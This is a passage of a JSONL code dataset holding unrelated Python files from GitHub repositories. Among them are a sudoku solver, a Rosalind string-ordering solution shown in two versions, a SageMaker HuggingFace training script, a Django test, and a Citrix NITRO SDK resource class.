guessDefaultLossFunction(head[\"name\"])\n if head[\"name\"] not in loss_wts:\n loss_wts[ head[\"name\"] ] = 1\n \n return training_config\n\ndef getDefaultHeadConfig():\n cfg = {\n HeadConstants.name : None,\n HeadConstants.n_labels : -1,\n HeadConstants.bits : -1,\n HeadConstants.offset: -1,\n HeadConstants.activation : \"sigmoid\",\n HeadConstants.depth : 0, \n HeadConstants.resampler : \"max pool\"\n }\n return cfg\n\ndef loadConfig(config_path):\n pth = pathlib.Path(config_path)\n if pth.exists():\n cfg = json.load(open(pth, 'r'))\n else:\n cfg = getDefaultCerberusConfig()\n return cfg\n","repo_name":"FrancisCrickInstitute/ActiveUnetSegmentation","sub_path":"src/unetsl/cerberus/cerberus_config.py","file_name":"cerberus_config.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"8998219747","text":"import urllib\nfrom collections import namedtuple\nfrom django.test import TestCase\nfrom mock import Mock, patch\nfrom rufus.api import InternalAPI\nfrom rufus.commands import HelpCommand\n\nMockResponse = namedtuple('MockResponse', ['status_code', 'content'])\n\n\nclass HelpCommandTestCase(TestCase):\n\n def test_api_help(self):\n msg = Mock()\n\n def mocked_message_get(*args, **kwargs):\n if args[0] == 'From':\n return 'Somebody New <nobody@gmail.com>'\n elif args[0] == 'Subject':\n return 'HELP'\n\n msg.get = Mock(side_effect=mocked_message_get)\n\n with patch('rufus.api.InternalAPI.send_help_notification') as mock_send_help_notification:\n command = HelpCommand(msg)\n command.execute()\n mock_send_help_notification.assert_called_once_with('nobody@gmail.com')\n\n def test_api_help_requests_post(self):\n msg = Mock()\n\n def mocked_message_get(*args, **kwargs):\n if args[0] == 'From':\n return 'Somebody New <nobody@gmail.com>'\n elif args[0] == 'Subject':\n return 'Awesome title'\n\n msg.get = Mock(side_effect=mocked_message_get)\n\n with patch('rufus.api.requests.post', return_value=MockResponse(status_code=200, content=\"{}\")) as mock_post:\n command = HelpCommand(msg)\n command.execute()\n api = InternalAPI()\n mock_post.assert_called_once_with(api.API_SEND_HELP_NOTIFICATION % urllib.quote('nobody@gmail.com'),\n headers={'Content-type': 'application/json'},\n 
)","repo_name":"mei-chen/beagle","sub_path":"Dogbone/rufus/tests/test_help_command.py","file_name":"test_help_command.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"29665984878","text":"from utils import *\n\nrow_units = [cross(r, cols) for r in rows]\ncolumn_units = [cross(rows, c) for c in cols]\n\n# Backslash diagonal unit\nb_slash_diag = [[rows[c] + cols[c] for c in range(len(rows))]]\n# Forward slash diagonal unit\nf_slash_diag = [[rows[c] + cols[(len(cols) - 1) - c] for c in range(len(rows))]]\n\nsquare_units = [cross(rs, cs) for rs in ('ABC','DEF','GHI') for cs in ('123','456','789')]\nunitlist = row_units + column_units + square_units\n\n# add the new diagonal units\nunitlist = unitlist + b_slash_diag + f_slash_diag\n\nunits = dict((s, [u for u in unitlist if s in u]) for s in boxes)\npeers = dict((s, set(sum(units[s],[]))-set([s])) for s in boxes)\n\ndef naked_twins(values):\n \"\"\"Eliminate values using the naked twins strategy.\n\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n\n Returns\n -------\n dict\n The values dictionary with the naked twins eliminated from peers\n \"\"\"\n\n # Find all twin boxes - boxes with len() of 2\n twin_boxes = [box for box in values.keys() if len(values[box]) == 2]\n \n for twin_box in twin_boxes:\n twin_box_matches = []\n # Find Box units for each twin box - row, col, 3x3\n twin_box_units = [p for p in units[twin_box]]\n \n for box_unit in twin_box_units:\n for box in box_unit:\n # If theres a match, then its a naked twin\n if values[twin_box] == values[box] and twin_box != box:\n # Since its a naked twin, append the current unit (row, col or 3x3)\n if box_unit not in twin_box_matches:\n twin_box_matches.append(box_unit)\n \n if len(twin_box_matches) > 0:\n # For every unit in twin_box_matches\n for box_max in twin_box_matches:\n for box in box_max:\n for c in values[twin_box]:\n # If letter match\n if c in values[box] and values[twin_box] != values[box] and len(values[box]) >= 2:\n values[box] = values[box].replace(c, '')\n\n return values\n\ndef eliminate(values):\n \"\"\"Apply the eliminate strategy to a Sudoku puzzle\n\n The eliminate strategy says that if a box has a value assigned, then none\n of the peers of that box can have the same value.\n\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n\n Returns\n -------\n dict\n The values dictionary with the assigned values eliminated from peers\n \"\"\"\n solved_values = [box for box in values.keys() if len(values[box]) == 1]\n for box in solved_values:\n digit = values[box]\n for peer in peers[box]:\n values[peer] = values[peer].replace(digit,'')\n \n return values\n\ndef only_choice(values):\n \"\"\"Apply the only choice strategy to a Sudoku puzzle\n\n The only choice strategy says that if only one box in a unit allows a certain\n digit, then that box must be assigned that digit.\n\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n\n Returns\n -------\n dict\n The values dictionary with all single-valued boxes assigned\n \"\"\"\n for unit in unitlist:\n for digit in '123456789':\n dplaces = [box for box in unit if digit in values[box]]\n if len(dplaces) == 1:\n values[dplaces[0]] = digit\n \n return values\n\ndef reduce_puzzle(values):\n \"\"\"Reduce a Sudoku puzzle by repeatedly applying all constraint strategies\n\n Parameters\n 
----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n\n Returns\n -------\n dict or False\n The values dictionary after continued application of the constraint strategies\n no longer produces any changes, or False if the puzzle is unsolvable \n \"\"\"\n stalled = False\n while not stalled:\n # Check how many boxes have a determined value\n solved_values_before = len([box for box in values.keys() if len(values[box]) == 1])\n # Use the Eliminate Strategy\n values = eliminate(values)\n # Use the Only Choice Strategy\n values = only_choice(values)\n # Use the Naked Twins Strategy\n values = naked_twins(values)\n # Check how many boxes have a determined value, to compare\n solved_values_after = len([box for box in values.keys() if len(values[box]) == 1])\n # If no new values were added, stop the loop.\n stalled = solved_values_before == solved_values_after\n # Sanity check, return False if there is a box with zero available values:\n if len([box for box in values.keys() if len(values[box]) == 0]):\n return False\n return values\n\ndef search(values):\n \"\"\"Apply depth first search to solve Sudoku puzzles in order to solve puzzles\n that cannot be solved by repeated reduction alone.\n\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n\n Returns\n -------\n dict or False\n The values dictionary with all boxes assigned or False\n \"\"\"\n\n # \"Using depth-first search and propagation, try all possible values.\"\n # First, reduce the puzzle using the previous function\n values = reduce_puzzle(values)\n if values is False:\n return False # Failed earlier\n if all(len(values[s]) == 1 for s in boxes): \n return values # Solved!\n # Choose one of the unfilled squares with the fewest possibilities - i.e the shortest string\n n,s = min((len(values[s]), s) for s in boxes if len(values[s]) > 1)\n \n # Now use recurrence to solve each one of the resulting sudokus, and\n # For each item in the string is each box\n for value in values[s]:\n # Copy the sudoku board\n new_sudoku = values.copy()\n # Replace new sudoku board box at position s with value (brute force)\n new_sudoku[s] = value\n attempt = search(new_sudoku)\n if attempt:\n return attempt\n\ndef solve(grid):\n \"\"\"Find the solution to a Sudoku puzzle using search and constraint propagation\n\n Parameters\n ----------\n grid(string)\n a string representing a sudoku grid.\n \n Ex. '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'\n\n Returns\n -------\n dict or False\n The dictionary representation of the final sudoku grid or False if no solution exists.\n \"\"\"\n values = grid2values(grid)\n values = search(values)\n return values\n\n\nif __name__ == \"__main__\":\n diag_sudoku_grid = '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'\n display(grid2values(diag_sudoku_grid))\n result = solve(diag_sudoku_grid)\n display(result)\n\n try:\n import PySudoku\n PySudoku.play(grid2values(diag_sudoku_grid), result, history)\n\n except SystemExit:\n pass\n except:\n print('We could not visualize your board due to a pygame issue. Not a problem! 
It is not a requirement.')\n","repo_name":"brendanmcgivern/aind-sudoku","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":7161,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"8482288511","text":"# Ordering Strings of Varying Length Lexicographically\n# rosalind.info/problems/lexv/\nimport sys\nfrom itertools import *\n\nclass lexv:\n def combine(self, symbols, n, vary='', result=None):\n # avoid a shared mutable default argument between calls\n if result is None:\n result = []\n if n > 0:\n for sym in symbols:\n el = vary + sym\n result.append(el)\n self.combine(symbols, n - 1, el, result)\n\n return result\n\n def main(self, dna_file):\n symbols = dna_file.readline()\n symbols = list(symbols[:-1])\n # keep a list (not a filter iterator) so it can be iterated repeatedly during recursion\n symbols = [x for x in symbols if x != ' ']\n n = int(dna_file.readline())\n\n return self.combine(symbols, n)\n\nif __name__ == '__main__':\n filename = sys.argv[1]\n if not filename:\n raise Exception('ERROR: File name should not be empty!')\n\n with open(filename, 'r') as seq_file:\n result = lexv().main(seq_file)\n print('\\n'.join(result))","repo_name":"yuriyshapovalov/Prototypes","sub_path":"Rosalind/lexv.py","file_name":"lexv.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74498542120","text":"import argparse\r\nfrom transformers import AdamW, AutoModelForSequenceClassification, get_scheduler, AutoTokenizer, DataCollatorWithPadding\r\nfrom torch.utils.data import DataLoader\r\nimport torch.utils.data.distributed as data_dist\r\nfrom datasets import load_from_disk\r\nimport evaluate\r\n#from datasets.filesystems import S3FileSystem\r\nimport torch as th\r\nfrom tqdm.auto import tqdm\r\nimport json\r\n\r\nimport logging\r\nimport sys\r\nimport os\r\n\r\n\r\n#from utils import set_global_logging_level\r\n\r\nlogger = logging.getLogger(__name__)\r\nlogging.basicConfig(\r\n    level=logging.getLevelName(\"INFO\"),\r\n    handlers=[logging.StreamHandler(sys.stdout)],\r\n    format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\r\n)\r\n\r\n\r\ndef _get_train_dataloader(dataset_dir, train_batch_size, data_collator=None, is_distributed=False, **kwargs):\r\n    logger.info(\"Getting train dataloader\")\r\n    \r\n    train_dataset = load_from_disk(dataset_dir)\r\n    train_dataset = train_dataset.remove_columns(\"text\")\r\n    train_sampler = (\r\n        data_dist.DistributedSampler(train_dataset) if is_distributed else None\r\n    )\r\n    return DataLoader(\r\n        train_dataset,\r\n        batch_size=train_batch_size,\r\n        shuffle=train_sampler is None,\r\n        sampler=train_sampler,\r\n        collate_fn=data_collator,\r\n        **kwargs,\r\n    )\r\n\r\ndef _get_test_dataloader(dataset_dir, test_batch_size, data_collator=None, **kwargs):\r\n    
logger.info(\"Getting test dataloader.\")\r\n \r\n test_dataset = load_from_disk(dataset_dir)\r\n return DataLoader(\r\n test_dataset,\r\n batch_size=test_batch_size,\r\n shuffle=True,\r\n collate_fn=data_collator,\r\n **kwargs,\r\n )\r\n\r\n\r\ndef train(args):\r\n \r\n device = th.device(\"cuda\" if th.cuda.is_available() else \"cpu\")\r\n \r\n tokenizer = AutoTokenizer.from_pretrained(args.model_name)\r\n data_collator = DataCollatorWithPadding(tokenizer=tokenizer, padding=True)\r\n \r\n train_dataloader = _get_train_dataloader(args.training_dir, args.train_batch_size, data_collator=data_collator)\r\n test_dataloader = _get_test_dataloader(args.testing_dir, args.test_batch_size, data_collator=data_collator)\r\n \r\n logger.debug(f\"Processes {len(train_dataloader.sampler)}/{len(train_dataloader.dataset)} ({100.0 * len(train_dataloader.sampler) / len(train_dataloader.dataset)}%) of train data\")\r\n logger.debug(f\"Processes {len(test_dataloader.sampler)}/{len(test_dataloader.dataset)} ({100.0 * len(test_dataloader.sampler) / len(test_dataloader.dataset)}%) of test data\")\r\n \r\n model = AutoModelForSequenceClassification.from_pretrained(args.model_name)\r\n \r\n model.to(device)\r\n \r\n optimizer = AdamW(model.parameters(), lr=float(args.learning_rate))\r\n \r\n num_training_steps = args.epochs * len(train_dataloader)\r\n lr_scheduler = get_scheduler(\r\n args.scheduler,\r\n optimizer=optimizer,\r\n num_warmup_steps=args.warmup_steps,\r\n num_training_steps=num_training_steps\r\n )\r\n\r\n #progress_bar = tqdm(range(num_training_steps))\r\n\r\n model.train()\r\n for _ in range(args.epochs):\r\n with tqdm(train_dataloader, unit=\"batch\") as training_epoch:\r\n for batch in training_epoch:\r\n \r\n batch = {k: v.to(device) for k, v in batch.items()}\r\n outputs = model(**batch)\r\n \r\n loss = outputs.loss\r\n loss.backward()\r\n\r\n optimizer.step()\r\n lr_scheduler.step()\r\n optimizer.zero_grad()\r\n\r\n correct = training_performance(outputs, batch)\r\n accuracy = correct / args.train_batch_size\r\n\r\n training_epoch.set_postfix(loss=loss.item(), accuracy=100. 
* accuracy)\r\n #progress_bar.update(1)\r\n \r\n evaluate_model(model, test_dataloader, device)\r\n\r\n save_model(model, tokenizer, args.model_dir)\r\n logger.info(f\"Made it this far\")\r\n\r\ndef training_performance(outputs, batch):\r\n \r\n correct = 0\r\n labels = batch.pop(\"labels\")\r\n logits = outputs.logits\r\n predictions = th.argmax(logits, dim=-1)\r\n correct += predictions.eq(labels.view_as(predictions)).sum().item()\r\n return correct\r\n\r\ndef evaluate_model(model, test_dataloader, device):\r\n logger.info(f\"Evaluating...\")\r\n\r\n metric = evaluate.load(\"glue\", \"mrpc\")\r\n model.eval()\r\n for batch in test_dataloader:\r\n batch = {k: v.to(device) for k, v in batch.items()}\r\n with th.no_grad():\r\n outputs = model(**batch)\r\n\r\n logits = outputs.logits\r\n predictions = th.argmax(logits, dim=-1)\r\n metric.add_batch(predictions=predictions, references=batch.pop(\"labels\"))\r\n test_loss = compute_loss(model, test_dataloader, device)\r\n logger.info(f\"{metric.compute()} - loss = {test_loss}\")\r\n\r\n\r\n# def compute_loss(model, inputs, test_dataloader):\r\n# model.eval()\r\n# test_loss = 0\r\n# loss_function = th.nn.NLLLoss()\r\n# with th.no_grad():\r\n# for batch in test_dataloader:\r\n# outputs = model(**batch)\r\n# logits = outputs.logits\r\n# predictions = th.argmax(logits, dim=-1)\r\n# test_loss += loss_function(predictions, batch.pop(\"labels\"), size_average=False).item()\r\n \r\n# test_loss /= len(test_dataloader.dataset)\r\n# return test_loss\r\n\r\ndef compute_loss(model, test_dataloader, device):\r\n model.eval()\r\n test_loss = 0\r\n with th.no_grad():\r\n for batch in test_dataloader:\r\n batch = {k: v.to(device) for k, v in batch.items()}\r\n outputs = model(**batch) \r\n test_loss += outputs.loss\r\n \r\n test_loss /= len(test_dataloader.dataset)\r\n return test_loss\r\n\r\n\r\n# def model_fn(model_dir):\r\n # device = th.device(\"cuda\" if th.cuda.is_available() else \"cpu\")\r\n # #model = th.nn.DataParallel(NeuralNet())\r\n # with open(os.path.join(model_dir, \"model.pth\"), \"rb\") as f:\r\n # model.load_state_dict(torch.load(f))\r\n # return model.to(device)\r\n\r\n\r\ndef save_model(model, tokenizer, model_dir):\r\n logger.info(\"Saving the model.\")\r\n\r\n model.save_pretrained(model_dir, state_dict=model.cpu().state_dict())\r\n tokenizer.save_pretrained(model_dir)\r\n\r\nif __name__ == '__main__':\r\n \r\n parser = argparse.ArgumentParser()\r\n \r\n parser.add_argument(\"--epochs\", type=int, default=1, help=\"Number of training epochs. Default=1\")\r\n parser.add_argument(\"--train_batch_size\", type=int, default=16, help=\"Batch size for training. Default=16\")\r\n parser.add_argument(\"--test_batch_size\", type=int, default=100, help=\"Batch size for testing. Default=100\")\r\n parser.add_argument(\"--warmup_steps\", type=int, default=500, help=\"Number of warmmup steps. Default=500\")\r\n parser.add_argument(\"--scheduler\", type=str, default=\"linear\", help=\"HuggingFace learning rate scheduler. Default='linear'\")\r\n parser.add_argument(\"--learning_rate\", type=str, default=\"5e-5\", help=\"Learning rate. Default=5e-5\")\r\n parser.add_argument(\"--model_name\", type=str, default=\"distilbert-base-uncased\", help=\"Pretrained Huggingface model. Default='distilbert-base-uncased'\")\r\n parser.add_argument(\"--tokenizer\", type=str, default=\"distilbert-base-uncased\", help=\"HuggingFace tokenizer. 
Default='distilbert-base-uncased'\")\r\n \r\n # Container environment\r\n parser.add_argument(\"--hosts\", type=list, default=json.loads(os.environ[\"SM_HOSTS\"]))\r\n parser.add_argument(\"--current-host\", type=str, default=os.environ[\"SM_CURRENT_HOST\"])\r\n\r\n parser.add_argument(\"--output_data_dir\", type=str, default=os.environ[\"SM_OUTPUT_DATA_DIR\"])\r\n parser.add_argument(\"--model_dir\", type=str, default=os.environ[\"SM_MODEL_DIR\"])\r\n parser.add_argument(\"--n_gpus\", type=str, default=os.environ[\"SM_NUM_GPUS\"])\r\n parser.add_argument(\"--training_dir\", type=str, default=os.environ[\"SM_CHANNEL_TRAIN\"])\r\n parser.add_argument(\"--testing_dir\", type=str, default=os.environ[\"SM_CHANNEL_TEST\"])\r\n \r\n args, _ = parser.parse_known_args()\r\n \r\n train(args)\r\n","repo_name":"cfcooney/sagemaker_sdk_examples","sub_path":"huggingface_estimator/scripts/bespoke_training.py","file_name":"bespoke_training.py","file_ext":"py","file_size_in_byte":8109,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"8482288511","text":"# Ordering Strings of Varying Length Lexicographically\n# rosalind.info/problems/lexv/\nimport sys\nfrom itertools import *\n\nclass lexv:\n def combine(self, symbols, n, vary='', result=[]):\n if n > 0:\n for sym in symbols:\n el = vary + sym\n result.append(el)\n self.combine(symbols, n - 1, el, result)\n\n return result\n\n def main(self, dna_file):\n symbols = dna_file.readline()\n symbols = list(symbols[:-1])\n symbols = filter(lambda x: str(x) != ' ' , symbols)\n n = int(dna_file.readline())\n\n return self.combine(symbols, n)\n\nif __name__ == '__main__':\n filename = sys.argv[1]\n if not filename:\n raise Exception('ERROR: File name should not be empty!')\n\n with open(filename, 'r') as seq_file:\n result = lexv().main(seq_file)\n print('\\n'.join(result))","repo_name":"yuriyshapovalov/Prototypes","sub_path":"Rosalind/lexv.py","file_name":"lexv.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2612103264","text":"from massrc.com.citrix.mas.nitro.resource.Base import *\nfrom massrc.com.citrix.mas.nitro.service.options import options\nfrom massrc.com.citrix.mas.nitro.exception.nitro_exception import nitro_exception\nfrom massrc.com.citrix.mas.nitro.util.filtervalue import filtervalue\nfrom massrc.com.citrix.mas.nitro.resource.Base.base_resource import base_resource\nfrom massrc.com.citrix.mas.nitro.resource.Base.base_response import base_response\n\n\n'''\nConfiguration for NetScaler GSLB Service resource\n'''\n\nclass ns_gslb_service(base_resource):\n\t_fqdn= \"\"\n\t_password= \"\"\n\t_sites= \"\"\n\t_tenant= \"\"\n\t_id= \"\"\n\t_siteList=[]\n\t__count=\"\"\n\t'''\n\tget the resource id\n\t'''\n\tdef get_resource_id(self) :\n\t\ttry:\n\t\t\tif hasattr(self, 'id'):\n\t\t\t\treturn self.id \n\t\t\telse:\n\t\t\t\treturn None \n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tget the resource type\n\t'''\n\tdef get_object_type(self) :\n\t\ttry:\n\t\t\treturn \"ns_gslb_service\"\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tReturns the value of object identifier argument.\n\t'''\n\tdef get_object_id(self) :\n\t\ttry:\n\t\t\treturn self._id\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tReturns the value of object file path argument.\n\t'''\n\t@property\n\tdef file_path_value(self) :\n\t\ttry:\n\t\t\treturn None\n\t\texcept Exception as e :\n\t\t\traise 
e\n\n\t'''\n\tReturns the value of object file component name.\n\t'''\n\t@property\n\tdef file_component_value(self) :\n\t\ttry :\n\t\t\treturn \"ns_gslb_services\"\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\n\t'''\n\tget Domain Name\n\t'''\n\t@property\n\tdef fqdn(self) :\n\t\ttry:\n\t\t\treturn self._fqdn\n\t\texcept Exception as e :\n\t\t\traise e\n\t'''\n\tset Domain Name\n\t'''\n\t@fqdn.setter\n\tdef fqdn(self,fqdn):\n\t\ttry :\n\t\t\tif not isinstance(fqdn,str):\n\t\t\t\traise TypeError(\"fqdn must be set to str value\")\n\t\t\tself._fqdn = fqdn\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\t'''\n\tget The pass-phrase that was used to encrypt the private-key.\n\t'''\n\t@property\n\tdef password(self) :\n\t\ttry:\n\t\t\treturn self._password\n\t\texcept Exception as e :\n\t\t\traise e\n\t'''\n\tset The pass-phrase that was used to encrypt the private-key.\n\t'''\n\t@password.setter\n\tdef password(self,password):\n\t\ttry :\n\t\t\tif not isinstance(password,str):\n\t\t\t\traise TypeError(\"password must be set to str value\")\n\t\t\tself._password = password\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\t'''\n\tget List of sites\n\t'''\n\t@property\n\tdef sites(self) :\n\t\ttry:\n\t\t\treturn self._sites\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\t'''\n\tget Tenant Name\n\t'''\n\t@property\n\tdef tenant(self) :\n\t\ttry:\n\t\t\treturn self._tenant\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\t'''\n\tget Id is system generated key for all the NetScaler GSLB Service\n\t'''\n\t@property\n\tdef id(self) :\n\t\ttry:\n\t\t\treturn self._id\n\t\texcept Exception as e :\n\t\t\traise e\n\t'''\n\tset Id is system generated key for all the NetScaler GSLB Service\n\t'''\n\t@id.setter\n\tdef id(self,id):\n\t\ttry :\n\t\t\tif not isinstance(id,str):\n\t\t\t\traise TypeError(\"id must be set to str value\")\n\t\t\tself._id = id\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tList of sites\n\t'''\n\t@property\n\tdef siteList(self) :\n\t\ttry:\n\t\t\treturn self._siteList\n\t\texcept Exception as e :\n\t\t\traise e\n\t'''\n\tList of sites\n\t'''\n\t@siteList.setter\n\tdef siteList(self,siteList) :\n\t\ttry :\n\t\t\tif not isinstance(siteList,list):\n\t\t\t\traise TypeError(\"siteList must be set to array of str value\")\n\t\t\tfor item in siteList :\n\t\t\t\tif not isinstance(item,str):\n\t\t\t\t\traise TypeError(\"item must be set to str value\")\n\t\t\tself._siteList = siteList\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tUse this operation to add NetScaler GSLB Service.\n\t'''\n\t@classmethod\n\tdef add(cls,service=None,resource=None):\n\t\ttry:\n\t\t\tif resource is None :\n\t\t\t\traise Exception(\"Resource Object Not Found\")\n\t\t\tif type(resource) is not list :\n\t\t\t\treturn resource.perform_operation(service,\"add\")\n\t\t\telse : \n\t\t\t\tns_gslb_service_obj= ns_gslb_service()\n\t\t\t\treturn cls.perform_operation_bulk_request(service,\"add\", resource,ns_gslb_service_obj)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tUse this operation to delete NetScaler GSLB Service.\n\t'''\n\t@classmethod\n\tdef delete(cls,client=None,resource=None): \n\t\ttry :\n\t\t\tif resource is None :\n\t\t\t\traise Exception(\"Resource Object Not Found\")\n\t\t\tif type(resource) is not list :\n\t\t\t\treturn resource.delete_resource(client)\n\t\t\telse :\n\t\t\t\t\tns_gslb_service_obj=ns_gslb_service()\n\t\t\t\t\treturn cls.delete_bulk_request(client,resource,ns_gslb_service_obj)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tUse this operation 
to get NetScaler GSLB Service.\n\t'''\n\t@classmethod\n\tdef get(cls,client = None,resource=\"\",option_=\"\"): \n\t\ttry:\n\t\t\tresponse=\"\"\n\t\t\tif not resource :\n\t\t\t\tns_gslb_service_obj=ns_gslb_service()\n\t\t\t\tresponse = ns_gslb_service_obj.get_resources(client,option_)\n\t\t\telse:\n\t\t\t\tresponse = resource.get_resource(client, option_)\n\t\t\treturn response\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tUse this operation to modify NetScaler GSLB Service.\n\t'''\n\t@classmethod\n\tdef update(cls,client=None,resource=None):\n\t\ttry:\n\t\t\tif resource is None :\n\t\t\t\traise Exception(\"Resource Object Not Found\")\n\t\t\tif type(resource) is not list :\n\t\t\t\treturn resource.update_resource(client)\n\t\t\telse :\n\t\t\t\tns_gslb_service_obj=ns_gslb_service()\n\t\t\t\treturn cls.update_bulk_request(client,resource,ns_gslb_service_obj)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tUse this API to fetch filtered set of ns_gslb_service resources.\n\tfilter string should be in JSON format.eg: \"vm_state:DOWN,name:[a-z]+\"\n\t'''\n\t@classmethod\n\tdef get_filtered(cls,service,filter_) :\n\t\ttry:\n\t\t\tns_gslb_service_obj = ns_gslb_service()\n\t\t\toption_ = options()\n\t\t\toption_._filter=filter_\n\t\t\treturn ns_gslb_service_obj.getfiltered(service, option_)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\t* Use this API to count the ns_gslb_service resources.\n\t'''\n\t@classmethod\n\tdef count(cls,service) :\n\t\ttry:\n\t\t\tns_gslb_service_obj = ns_gslb_service()\n\t\t\toption_ = options()\n\t\t\toption_._count=True\n\t\t\tresponse = ns_gslb_service_obj.get_resources(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tUse this API to count the filtered set of ns_gslb_service resources.\n\tfilter string should be in JSON format.eg: \"vm_state:DOWN,name:[a-z]+\"\n\t'''\n\t@classmethod\n\tdef count_filtered(cls,service,filter_):\n\t\ttry:\n\t\t\tns_gslb_service_obj = ns_gslb_service()\n\t\t\toption_ = options()\n\t\t\toption_._count=True\n\t\t\toption_._filter=filter_\n\t\t\tresponse = ns_gslb_service_obj.getfiltered(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['_count']\n\t\t\treturn 0;\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tConverts API response into object and returns the object array in case of get request.\n\t'''\n\tdef get_nitro_response(self,service ,response):\n\t\ttry :\n\t\t\tresult=service.payload_formatter.string_to_resource(ns_gslb_service_response, response, self.__class__.__name__)\n\t\t\tif(result.errorcode != 0) :\n\t\t\t\tif (result.errorcode == 444) :\n\t\t\t\t\tservice.clear_session(self)\n\t\t\t\tif result.severity :\n\t\t\t\t\tif (result.severity == \"ERROR\") :\n\t\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\t\telse :\n\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\treturn result.ns_gslb_service\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\t'''\n\tConverts API response into object and returns the object array .\n\t'''\n\tdef get_nitro_bulk_response(self,service ,response):\n\t\ttry :\n\t\t\tresult=service.payload_formatter.string_to_resource(ns_gslb_service_responses, response, \"ns_gslb_service_response_array\")\n\t\t\tif(result.errorcode != 0) :\n\t\t\t\tif (result.errorcode == 444) :\n\t\t\t\t\tservice.clear_session(self)\n\t\t\t\tresponse = 
result.ns_gslb_service_response_array\n\t\t\t\ti=0\n\t\t\t\terror = [ns_gslb_service() for _ in range(len(response))]\n\t\t\t\tfor obj in response :\n\t\t\t\t\terror[i]= obj._message\n\t\t\t\t\ti=i+1\n\t\t\t\traise nitro_exception(result.errorcode, str(result.message), error)\n\t\t\tresponse = result.ns_gslb_service_response_array\n\t\t\ti=0\n\t\t\tns_gslb_service_objs = [ns_gslb_service() for _ in range(len(response))]\n\t\t\tfor obj in response :\n\t\t\t\tif hasattr(obj,'_ns_gslb_service'):\n\t\t\t\t\tfor props in obj._ns_gslb_service:\n\t\t\t\t\t\tresult = service.payload_formatter.string_to_bulk_resource(ns_gslb_service_response,self.__class__.__name__,props)\n\t\t\t\t\t\tns_gslb_service_objs[i] = result.ns_gslb_service\n\t\t\t\t\t\ti=i+1\n\t\t\treturn ns_gslb_service_objs\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\t'''\n\tPerforms generic data validation for the operation to be performed\n\t'''\n\tdef validate(self,operationType):\n\t\ttry:\n\t\t\tsuper(ns_gslb_service,self).validate()\n\t\texcept Exception as e :\n\t\t\traise e\n\n'''\nForms the proper response.\n'''\nclass ns_gslb_service_response(base_response):\n\tdef __init__(self,length=1) :\n\t\tself.ns_gslb_service= []\n\t\tself.errorcode = 0 \n\t\tself.message = \"\" \n\t\tself.severity = \"\" \n\t\tself.ns_gslb_service= [ ns_gslb_service() for _ in range(length)]\n'''\nForms the proper response for bulk operation.\n'''\nclass ns_gslb_service_responses(base_response):\n\tdef __init__(self,length=1) :\n\t\tself.ns_gslb_service_response_array = []\n\t\tself.errorcode = 0 \n\t\tself.message = \"\" \n\t\tself.ns_gslb_service_response_array = [ ns_gslb_service() for _ in range(length)]\n","repo_name":"MayankTahil/nitro-ide","sub_path":"mas_nitro-python-1.0/massrc/com/citrix/mas/nitro/resource/config/ns/ns_gslb_service.py","file_name":"ns_gslb_service.py","file_ext":"py","file_size_in_byte":9026,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"12854746490","text":"class EvaluationFunction(object):\n \"\"\"Store evaluation functions\"\"\"\n def __init__(self, data, factory):\n self.data = data\n self.factory = factory\n\n def evaluate(self, timetable):\n \"\"\"Return sum of penalties\"\"\"\n\n penalty = self.countRoomCapacityPenalty(timetable)\n penalty += self.countMinimumWorkingDaysPenalty(timetable)\n penalty += self.countCurriculumCompactnessPenalty(timetable)\n penalty += self.countRoomStabilityPenalty(timetable)\n penalty += self.countConflictsPenalty(timetable)\n penalty += self.countLectureConflictsPenalty(timetable)\n penalty += self.countAvailabilitesPenalty(timetable)\n\n return penalty\n\n def countRoomCapacityPenalty(self, timetable):\n 